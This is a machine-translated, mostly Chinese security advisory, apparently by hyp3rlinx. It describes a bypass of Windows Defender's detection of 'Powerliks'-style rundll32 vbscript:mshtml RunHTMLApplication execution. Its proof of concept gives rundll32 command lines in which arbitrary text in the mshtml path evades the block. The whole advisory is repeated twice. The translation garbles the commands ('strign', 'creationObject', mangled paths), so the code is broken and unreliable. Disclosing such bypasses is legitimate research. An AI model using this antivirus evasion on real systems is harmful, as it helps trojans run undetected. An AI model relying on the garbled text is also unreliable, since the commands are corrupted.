[+] Credits: John Page(又名Hyp3rlinx)
[+]网站: hyp3rlinx.altervista.org
[+]源: https://hyp3rlinx.altervista.org/AD...EFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.TXT
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.microsoft.com
[产品]
Windows Defender
[漏洞类型]
Windows Defender VBScript检测缓解旁路
trojanwin32powessere.g
[CVE参考]
N/A。
[安全问题]
通常,Windows Defender检测并防止Trojanwin32Powessere.g aka“ Powerliks”类型执行,该执行利用Rundll32.exe。尝试执行失败
攻击者通常会获得“访问被拒绝”错误消息。以前,我已经使用Rundll32 JavaScript披露了3个旁路,此示例利用VBScript和ActiveX引擎。
运行rundll32 vbscript:'\\ . \\ mshtml \\ . \\ mshtml \\ . \\ mshtml,runhtmlapplication'+strign(createObject(createObject('wscript.shell'shell')。
“访问被拒绝”消息。
Trojan:Win32/powessere.g
类别:特洛伊木马
该程序是危险的,并执行攻击者的命令。
但是,您可以为第二个MSHTML参数添加任意文本,以构建我以前基于JavaScript的旁路以构建裙子Defender检测。
例如,添加“ shtml”,“大声笑”或其他文本,并在撰写本文时执行。
例如。
c: \ secrundll32 vbscript:'\\ . \\ mshtml \\ . \\ pwn \\ . \\ . \\ mshtml,runhtmlapplication'
[参考]
[漏洞/POC]
打开命令提示作为管理员
c: \ secrundll32 vbscript:'\\ . \\ mshtml \\ . \\ mshtml \\ . \\ mshtml,runhtmlapplication'
访问被拒绝。
c: \ secrundll32 vbscript:'\\ . \\ mshtml \\ . \\ lol \\ . \\ mshtml,runhtmlapplication'+string'+strign(creationObject(creationObject('wscript.shell'wscript.shell')
我们赢了!
[网络访问]
当地的
[严重性]
高的
[披露时间表]
供应商通知:
2024年2月18日:公共披露
[+]免责声明
本建议中包含的信息“按原样”提供,没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配,只要除了对其进行改革,没有对其进行更改,并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责,并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容(c)。
HYP3RLINX
[+]网站: hyp3rlinx.altervista.org
[+]源: https://hyp3rlinx.altervista.org/AD...EFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.TXT
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.microsoft.com
[产品]
Windows Defender
[漏洞类型]
Windows Defender VBScript检测缓解旁路
trojanwin32powessere.g
[CVE参考]
N/A。
[安全问题]
通常,Windows Defender检测并防止Trojanwin32Powessere.g aka“ Powerliks”类型执行,该执行利用Rundll32.exe。尝试执行失败
攻击者通常会获得“访问被拒绝”错误消息。以前,我已经使用Rundll32 JavaScript披露了3个旁路,此示例利用VBScript和ActiveX引擎。
运行rundll32 vbscript:'\\ . \\ mshtml \\ . \\ mshtml \\ . \\ mshtml,runhtmlapplication'+strign(createObject(createObject('wscript.shell'shell')。
“访问被拒绝”消息。
Trojan:Win32/powessere.g
类别:特洛伊木马
该程序是危险的,并执行攻击者的命令。
但是,您可以为第二个MSHTML参数添加任意文本,以构建我以前基于JavaScript的旁路以构建裙子Defender检测。
例如,添加“ shtml”,“大声笑”或其他文本,并在撰写本文时执行。
例如。
c: \ secrundll32 vbscript:'\\ . \\ mshtml \\ . \\ pwn \\ . \\ . \\ mshtml,runhtmlapplication'
[参考]
正在加载...
hyp3rlinx.altervista.org
正在加载...
lolbas-project.github.io
打开命令提示作为管理员
c: \ secrundll32 vbscript:'\\ . \\ mshtml \\ . \\ mshtml \\ . \\ mshtml,runhtmlapplication'
访问被拒绝。
c: \ secrundll32 vbscript:'\\ . \\ mshtml \\ . \\ lol \\ . \\ mshtml,runhtmlapplication'+string'+strign(creationObject(creationObject('wscript.shell'wscript.shell')
我们赢了!
[网络访问]
当地的
[严重性]
高的
[披露时间表]
供应商通知:
2024年2月18日:公共披露
[+]免责声明
本建议中包含的信息“按原样”提供,没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配,只要除了对其进行改革,没有对其进行更改,并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责,并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容(c)。
HYP3RLINX